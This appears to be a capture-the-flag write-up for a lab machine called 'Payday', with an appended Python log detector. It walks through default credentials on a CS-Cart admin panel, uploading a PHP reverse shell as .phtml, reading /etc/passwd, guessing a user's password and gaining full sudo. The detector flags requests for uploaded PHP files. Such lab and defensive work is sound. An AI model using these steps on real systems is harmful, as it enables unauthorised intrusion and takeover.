Payday
Enumeration
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
Default credentials - admin:admin
CS-Cart 1.3.3 - authenticated RCE
https://www.exploit-db.com/exploits/48891
Get a PHP reverse shell from http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Edit the IP and PORT values
Upload it via the file manager, changing the extension from .php to .phtml
Visit http://[victim]/skins/shell.phtml --> Profit!
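Detection side of the upload step above, as an added example (not part of the original notes or the exploit-db entry): it flags access-log requests for PHP-handled files under a web-writable directory. The extension list, the /skins/ prefix and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: extensions mapped to the PHP handler; confirm against the server's Apache config.
PHP_EXTS = {"php", "phtml", "pht", "php3", "php4", "php5", "phar"}
# Assumption: web-writable directories (the upload on this page landed in /skins/).
WRITABLE_PREFIXES = ("/skins/",)

# Apache common/combined format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')


def is_script_path(path):
    """True if any extension in the file name is PHP-mapped (matched case-insensitively)."""
    name = path.rsplit("/", 1)[-1].lower()
    # mod_mime considers every extension, so x.phtml.jpg can still reach the PHP handler.
    return any(ext in PHP_EXTS for ext in name.split(".")[1:])


def find_script_hits(lines, prefixes=WRITABLE_PREFIXES):
    """Return (client, method, path, status) for script requests under writable dirs."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, method, target, status = m.groups()
        path = unquote(target.split("?", 1)[0])  # drop query string, decode %xx
        if path.startswith(tuple(prefixes)) and is_script_path(path):
            hits.append((client, method, path, int(status)))
    return hits


# Constructed sample log lines (documentation addresses, not taken from this write-up).
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /skins/shell.phtml HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /skins/basic/logo.gif HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /skins/a.PhP5.jpg?c=1 HTTP/1.1" 200 90 "-" "-"',
    '198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "GET /index.php?target=products HTTP/1.1" 200 4000 "-" "-"',
    '198.51.100.9 - - [10/Oct/2023:13:56:09 +0000] "POST /skins/%73hell.phtml HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_script_hits(SAMPLE):
        print(hit)
```

A hit with status 200 under a directory that should hold only static skin files is the one to triage first.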
Initial Access
Visited and got reverse shell - https://192.168.117.39/skins/shell.phtml
PrivEsc
$ cat /etc/passwd
...
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
Brute force with rockyou, or just try the simple guess :)
patrick:patrick
sudo -l
(ALL) ALL